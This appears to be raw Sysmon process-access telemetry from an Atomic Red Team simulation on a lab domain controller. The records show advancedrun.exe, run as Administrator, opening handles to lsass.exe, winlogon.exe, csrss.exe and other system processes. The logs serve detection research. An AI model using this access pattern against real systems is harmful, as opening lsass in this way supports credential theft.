17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983918Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983917Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983916Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983915Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983914Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983913Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983912Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983911Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983910Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983909Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983908Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983907Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983906Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983905Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983904Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983903Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983902Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 